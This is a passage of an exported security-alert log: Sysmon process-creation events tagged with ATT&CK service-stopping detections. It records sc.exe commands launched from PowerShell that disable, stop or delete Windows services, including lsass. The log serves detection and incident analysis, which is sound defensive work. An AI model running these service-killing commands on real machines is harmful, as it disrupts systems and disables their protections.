Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config sysmgt Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.001",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.299 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010afe42a00} +ProcessId: 4672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.312227100Z"",""eventRecordID"":""3123"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.299\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010afe42a00}\r\nProcessId: 4672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:24.299"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010afe42a00}"",""processId"":""4672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.925",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.234 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010fee02a00} +ProcessId: 8032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.242388000Z"",""eventRecordID"":""3120"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.234\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010fee02a00}\r\nProcessId: 8032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.234"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010fee02a00}"",""processId"":""8032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.906",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.187 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001092de2a00} +ProcessId: 1288 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete system 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.191950200Z"",""eventRecordID"":""3118"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.187\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001092de2a00}\r\nProcessId: 1288\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.187"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-001092de2a00}"",""processId"":""1288"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.843",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.169 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00106bdd2a00} +ProcessId: 7088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.174203900Z"",""eventRecordID"":""3117"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.169\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00106bdd2a00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.169"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-00106bdd2a00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.491",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.093 
+ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010e8d82a00} +ProcessId: 3580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.099893100Z"",""eventRecordID"":""3114"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.093\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010e8d82a00}\r\nProcessId: 3580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.093"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010e8d82a00}"",""processId"":""3580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", 
+"May 29, 2020 @ 14:19:52.428",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.726 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010cccf2a00} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.730510000Z"",""eventRecordID"":""3111"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.726\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010cccf2a00}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.726"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010cccf2a00}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
